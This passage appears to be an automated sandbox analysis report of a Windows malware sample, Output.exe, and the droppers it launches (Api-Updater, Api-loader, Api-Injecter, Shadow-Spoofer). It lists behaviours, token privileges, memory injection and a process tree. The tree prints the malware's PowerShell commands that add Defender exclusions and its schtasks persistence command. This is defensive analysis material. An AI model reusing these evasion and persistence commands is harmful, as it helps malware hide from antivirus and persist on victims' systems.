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" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\ValidDeviceId svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2652 schtasks.exe 2352 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1904 powershell.exe 1904 powershell.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 1484 Shadow-Spoofer.exe 4556 powershell.exe 4556 powershell.exe 3412 powershell.exe 3412 powershell.exe 2892 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3484 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4512 Api-Updater.exe Token: SeDebugPrivilege 3392 Api-loader.exe Token: SeDebugPrivilege 1484 Shadow-Spoofer.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 4556 powershell.exe Token: SeDebugPrivilege 3412 powershell.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 1244 powershell.exe Token: SeDebugPrivilege 4220 powershell.exe Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 2100 Api-Injecter.exe Token: SeDebugPrivilege 4764 dialer.exe Token: SeDebugPrivilege 1740 powershell.exe Token: SeDebugPrivilege 1724 uhmlgtreufhe.exe Token: SeDebugPrivilege 4648 dialer.exe Token: SeLockMemoryPrivilege 1220 dialer.exe Token: SeAssignPrimaryTokenPrivilege 1684 svchost.exe Token: SeIncreaseQuotaPrivilege 1684 svchost.exe Token: SeSecurityPrivilege 1684 svchost.exe Token: SeTakeOwnershipPrivilege 1684 svchost.exe Token: SeLoadDriverPrivilege 1684 svchost.exe Token: SeSystemtimePrivilege 1684 svchost.exe Token: SeBackupPrivilege 1684 svchost.exe Token: SeRestorePrivilege 1684 svchost.exe Token: SeShutdownPrivilege 1684 svchost.exe Token: SeSystemEnvironmentPrivilege 1684 svchost.exe Token: SeUndockPrivilege 1684 svchost.exe Token: SeManageVolumePrivilege 1684 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1684 svchost.exe Token: SeIncreaseQuotaPrivilege 1684 svchost.exe Token: SeSecurityPrivilege 1684 svchost.exe Token: SeTakeOwnershipPrivilege 1684 svchost.exe Token: SeLoadDriverPrivilege 1684 svchost.exe Token: SeSystemtimePrivilege 1684 svchost.exe Token: SeBackupPrivilege 1684 svchost.exe Token: SeRestorePrivilege 1684 svchost.exe Token: SeShutdownPrivilege 1684 svchost.exe Token: SeSystemEnvironmentPrivilege 1684 svchost.exe Token: SeUndockPrivilege 1684 svchost.exe Token: SeManageVolumePrivilege 1684 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1684 svchost.exe Token: SeIncreaseQuotaPrivilege 1684 svchost.exe Token: SeSecurityPrivilege 1684 svchost.exe Token: SeTakeOwnershipPrivilege 1684 svchost.exe Token: SeLoadDriverPrivilege 1684 svchost.exe Token: SeSystemtimePrivilege 1684 svchost.exe Token: SeBackupPrivilege 1684 svchost.exe Token: SeRestorePrivilege 1684 svchost.exe Token: SeShutdownPrivilege 1684 svchost.exe Token: SeSystemEnvironmentPrivilege 1684 svchost.exe Token: SeUndockPrivilege 1684 svchost.exe Token: SeManageVolumePrivilege 1684 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1684 svchost.exe Token: SeIncreaseQuotaPrivilege 1684 svchost.exe Token: SeSecurityPrivilege 1684 svchost.exe Token: SeTakeOwnershipPrivilege 1684 svchost.exe Token: SeLoadDriverPrivilege 1684 svchost.exe Token: SeSystemtimePrivilege 1684 svchost.exe Token: SeBackupPrivilege 1684 svchost.exe Token: SeRestorePrivilege 1684 svchost.exe Token: SeShutdownPrivilege 1684 svchost.exe Token: SeSystemEnvironmentPrivilege 1684 svchost.exe Token: SeUndockPrivilege 1684 svchost.exe Token: SeManageVolumePrivilege 1684 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3484 Explorer.EXE 3484 Explorer.EXE 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3484 Explorer.EXE 3484 Explorer.EXE 3484 Explorer.EXE 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe 3756 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4512 Api-Updater.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3788 wrote to memory of 4512 3788 Output.exe 82 PID 3788 wrote to memory of 4512 3788 Output.exe 82 PID 3788 wrote to memory of 3392 3788 Output.exe 83 PID 3788 wrote to memory of 3392 3788 Output.exe 83 PID 3788 wrote to memory of 1484 3788 Output.exe 84 PID 3788 wrote to memory of 1484 3788 Output.exe 84 PID 3788 wrote to memory of 1484 3788 Output.exe 84 PID 3392 wrote to memory of 1904 3392 Api-loader.exe 86 PID 3392 wrote to memory of 1904 3392 Api-loader.exe 86 PID 3392 wrote to memory of 4556 3392 Api-loader.exe 88 PID 3392 wrote to memory of 4556 3392 Api-loader.exe 88 PID 3392 wrote to memory of 3412 3392 Api-loader.exe 90 PID 3392 wrote to memory of 3412 3392 Api-loader.exe 90 PID 4512 wrote to memory of 2892 4512 Api-Updater.exe 92 PID 4512 wrote to memory of 2892 4512 Api-Updater.exe 92 PID 3392 wrote to memory of 2652 3392 Api-loader.exe 94 PID 3392 wrote to memory of 2652 3392 Api-loader.exe 94 PID 3392 wrote to memory of 2100 3392 Api-loader.exe 96 PID 3392 wrote to memory of 2100 3392 Api-loader.exe 96 PID 4512 wrote to memory of 1244 4512 Api-Updater.exe 97 PID 4512 wrote to memory of 1244 4512 Api-Updater.exe 97 PID 4512 wrote to memory of 4220 4512 Api-Updater.exe 99 PID 4512 wrote to memory of 4220 4512 Api-Updater.exe 99 PID 4512 wrote to memory of 2352 4512 Api-Updater.exe 101 PID 4512 wrote to memory of 2352 4512 Api-Updater.exe 101 PID 3100 wrote to memory of 844 3100 cmd.exe 114 PID 3100 wrote to memory of 844 3100 cmd.exe 114 PID 2100 wrote to memory of 4764 2100 Api-Injecter.exe 121 PID 2100 wrote to memory of 4764 2100 Api-Injecter.exe 121 PID 2100 wrote to memory of 4764 2100 Api-Injecter.exe 121 PID 2100 wrote to memory of 4764 2100 Api-Injecter.exe 121 PID 2100 wrote to memory of 4764 2100 Api-Injecter.exe 121 PID 2100 wrote to memory of 4764 2100 Api-Injecter.exe 121 PID 2100 wrote to memory of 4764 2100 Api-Injecter.exe 121 PID 4048 wrote to memory of 2240 4048 cmd.exe 134 PID 4048 wrote to memory of 2240 4048 cmd.exe 134 PID 4764 wrote to memory of 616 4764 dialer.exe 5 PID 4764 wrote to memory of 672 4764 dialer.exe 7 PID 4764 wrote to memory of 952 4764 dialer.exe 12 PID 4764 wrote to memory of 316 4764 dialer.exe 13 PID 4764 wrote to memory of 408 4764 dialer.exe 14 PID 4764 wrote to memory of 1044 4764 dialer.exe 16 PID 4764 wrote to memory of 1120 4764 dialer.exe 17 PID 4764 wrote to memory of 1148 4764 dialer.exe 18 PID 4764 wrote to memory of 1160 4764 dialer.exe 19 PID 4764 wrote to memory of 1172 4764 dialer.exe 20 PID 4764 wrote to memory of 1268 4764 dialer.exe 21 PID 4764 wrote to memory of 1332 4764 dialer.exe 22 PID 4764 wrote to memory of 1340 4764 dialer.exe 23 PID 4764 wrote to memory of 1448 4764 dialer.exe 24 PID 4764 wrote to memory of 1468 4764 dialer.exe 25 PID 4764 wrote to memory of 1548 4764 dialer.exe 26 PID 4764 wrote to memory of 1556 4764 dialer.exe 27 PID 4764 wrote to memory of 1660 4764 dialer.exe 28 PID 4764 wrote to memory of 1708 4764 dialer.exe 29 PID 4764 wrote to memory of 1764 4764 dialer.exe 30 PID 4764 wrote to memory of 1772 4764 dialer.exe 31 PID 4764 wrote to memory of 1868 4764 dialer.exe 32 PID 4764 wrote to memory of 1064 4764 dialer.exe 33 PID 4764 wrote to memory of 1416 4764 dialer.exe 34 PID 4764 wrote to memory of 1704 4764 dialer.exe 35 PID 4764 wrote to memory of 1684 4764 dialer.exe 36 PID 4764 wrote to memory of 1796 4764 dialer.exe 37 PID 4764 wrote to memory of 2188 4764 dialer.exe 38 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1148
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2812
-
-
C:\ProgramData\Api-Updater.exeC:\ProgramData\Api-Updater.exe2⤵
- Executes dropped EXE
PID:5760
-
-
C:\ProgramData\Api-loader.exeC:\ProgramData\Api-loader.exe2⤵
- Executes dropped EXE
PID:5824
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1448
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2604
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1796
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2260
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2820
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2876
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3384
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\Output.exe"C:\Users\Admin\AppData\Local\Temp\Output.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Users\Admin\AppData\Roaming\Api-Updater.exe"C:\Users\Admin\AppData\Roaming\Api-Updater.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Api-Updater.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Api-Updater.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Api-Updater.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4220
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Api-Updater" /tr "C:\ProgramData\Api-Updater.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
-
C:\Users\Admin\AppData\Roaming\Api-loader.exe"C:\Users\Admin\AppData\Roaming\Api-loader.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Api-loader.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Api-loader.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
